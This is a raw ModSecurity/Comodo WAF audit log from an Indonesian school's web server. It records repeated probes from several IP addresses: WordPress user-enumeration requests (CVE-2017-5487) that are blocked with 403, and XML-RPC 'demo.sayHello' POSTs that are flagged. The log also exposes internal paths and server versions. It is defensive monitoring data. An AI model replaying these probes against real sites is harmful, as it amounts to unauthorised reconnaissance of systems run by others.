X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c677ca18-C-- demo.sayHello --c677ca18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c677ca18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440834784480 4751 (- - -) Stopwatch2: 1747440834784480 4751; combined=3737, p1=455, p2=3078, p3=28, p4=25, p5=89, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c677ca18-Z-- --ee422524-A-- [17/May/2025:07:14:17 +0700] aCfU2XyxdQCiyU1ENFcmlgAAABE 103.236.140.4 42474 103.236.140.4 8181 --ee422524-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ee422524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee422524-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440857715065 2579 (- - -) Stopwatch2: 1747440857715065 2579; combined=1235, p1=440, p2=765, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee422524-Z-- --13352d32-A-- [17/May/2025:07:14:21 +0700] aCfU3em4kjNN-hEbWjJAogAAAEI 103.236.140.4 42478 103.236.140.4 8181 --13352d32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13352d32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13352d32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440861417286 2847 (- - -) Stopwatch2: 1747440861417286 2847; combined=1237, p1=429, p2=778, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13352d32-Z-- --81c1403f-A-- [17/May/2025:07:14:27 +0700] aCfU43yxdQCiyU1ENFcmmQAAABY 103.236.140.4 42484 103.236.140.4 8181 --81c1403f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.252 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --81c1403f-C-- demo.sayHello --81c1403f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --81c1403f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440867050546 6426 (- - -) Stopwatch2: 1747440867050546 6426; combined=4687, p1=627, p2=3876, p3=32, p4=36, p5=70, sr=81, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c1403f-Z-- --258a4a6f-A-- [17/May/2025:07:14:27 +0700] aCfU43yxdQCiyU1ENFcmmgAAABg 103.236.140.4 42486 103.236.140.4 8181 --258a4a6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --258a4a6f-C-- demo.sayHello --258a4a6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --258a4a6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440867744709 4974 (- - -) Stopwatch2: 1747440867744709 4974; combined=3715, p1=470, p2=3039, p3=26, p4=25, p5=90, sr=83, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --258a4a6f-Z-- --debfa245-A-- [17/May/2025:07:14:32 +0700] aCfU6HyxdQCiyU1ENFcmnQAAAAM 103.236.140.4 42492 103.236.140.4 8181 --debfa245-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --debfa245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --debfa245-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440872637057 1953 (- - -) Stopwatch2: 1747440872637057 1953; combined=985, p1=337, p2=622, p3=0, p4=0, p5=26, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --debfa245-Z-- --f1c27b09-A-- [17/May/2025:07:14:40 +0700] aCfU8Om4kjNN-hEbWjJAowAAAEM 103.236.140.4 42496 103.236.140.4 8181 --f1c27b09-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1c27b09-C-- demo.sayHello --f1c27b09-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1c27b09-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440880040536 6087 (- - -) Stopwatch2: 1747440880040536 6087; combined=4374, p1=540, p2=3499, p3=32, p4=34, p5=149, sr=77, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1c27b09-Z-- --4229c135-A-- [17/May/2025:07:14:59 +0700] aCfVA3yxdQCiyU1ENFcmoAAAAAg 103.236.140.4 42500 103.236.140.4 8181 --4229c135-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4229c135-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4229c135-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440899704335 2983 (- - -) Stopwatch2: 1747440899704335 2983; combined=1318, p1=430, p2=848, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4229c135-Z-- --011b657b-A-- [17/May/2025:07:15:00 +0700] aCfVBHyxdQCiyU1ENFcmoQAAAAk 103.236.140.4 42502 103.236.140.4 8181 --011b657b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --011b657b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --011b657b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440900059973 1916 (- - -) Stopwatch2: 1747440900059973 1916; combined=997, p1=330, p2=642, p3=0, p4=0, p5=25, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --011b657b-Z-- --815a0c4c-A-- [17/May/2025:07:15:05 +0700] aCfVCem4kjNN-hEbWjJApQAAAEQ 103.236.140.4 42508 103.236.140.4 8181 --815a0c4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --815a0c4c-C-- demo.sayHello --815a0c4c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --815a0c4c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440905038029 5973 (- - -) Stopwatch2: 1747440905038029 5973; combined=4350, p1=544, p2=3581, p3=29, p4=30, p5=97, sr=75, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --815a0c4c-Z-- --9e78fa76-A-- [17/May/2025:07:15:05 +0700] aCfVCXyxdQCiyU1ENFcmowAAAAw 103.236.140.4 42510 103.236.140.4 8181 --9e78fa76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9e78fa76-C-- demo.sayHello --9e78fa76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e78fa76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440905597344 4811 (- - -) Stopwatch2: 1747440905597344 4811; combined=3660, p1=462, p2=2996, p3=24, p4=27, p5=89, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e78fa76-Z-- --e208e400-A-- [17/May/2025:07:15:12 +0700] aCfVEOm4kjNN-hEbWjJAqAAAAEg 103.236.140.4 42516 103.236.140.4 8181 --e208e400-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e208e400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e208e400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440912628214 3304 (- - -) Stopwatch2: 1747440912628214 3304; combined=1413, p1=478, p2=902, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e208e400-Z-- --0726f55e-A-- [17/May/2025:07:15:14 +0700] aCfVEum4kjNN-hEbWjJAqQAAAEk 103.236.140.4 42518 103.236.140.4 8181 --0726f55e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0726f55e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0726f55e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440914083848 2826 (- - -) Stopwatch2: 1747440914083848 2826; combined=1276, p1=492, p2=756, p3=0, p4=0, p5=28, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0726f55e-Z-- --090c762f-A-- [17/May/2025:07:15:16 +0700] aCfVFOm4kjNN-hEbWjJAqgAAAEo 103.236.140.4 42524 103.236.140.4 8181 --090c762f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --090c762f-C-- demo.sayHello --090c762f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --090c762f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440916231683 6481 (- - -) Stopwatch2: 1747440916231683 6481; combined=4676, p1=636, p2=3802, p3=37, p4=43, p5=95, sr=82, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --090c762f-Z-- --3852e522-A-- [17/May/2025:07:15:18 +0700] aCfVFnyxdQCiyU1ENFcmpgAAAA8 103.236.140.4 42526 103.236.140.4 8181 --3852e522-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3852e522-C-- demo.sayHello --3852e522-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3852e522-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440918301751 5409 (- - -) Stopwatch2: 1747440918301751 5409; combined=4086, p1=545, p2=3325, p3=29, p4=32, p5=91, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3852e522-Z-- --d29d4c0e-A-- [17/May/2025:07:15:18 +0700] aCfVFnyxdQCiyU1ENFcmqAAAABQ 103.236.140.4 42530 103.236.140.4 8181 --d29d4c0e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d29d4c0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d29d4c0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440918977894 2054 (- - -) Stopwatch2: 1747440918977894 2054; combined=1051, p1=347, p2=677, p3=0, p4=0, p5=26, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d29d4c0e-Z-- --63360845-A-- [17/May/2025:07:15:26 +0700] aCfVHnyxdQCiyU1ENFcmqgAAABg 103.236.140.4 42536 103.236.140.4 8181 --63360845-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.51 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63360845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63360845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440926044731 15775 (- - -) Stopwatch2: 1747440926044731 15775; combined=27264, p1=385, p2=810, p3=0, p4=0, p5=13051, sr=74, sw=1, l=0, gc=13017 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63360845-Z-- --d0708424-A-- [17/May/2025:07:15:29 +0700] aCfVIXyxdQCiyU1ENFcmqwAAAAA 103.236.140.4 42538 103.236.140.4 8181 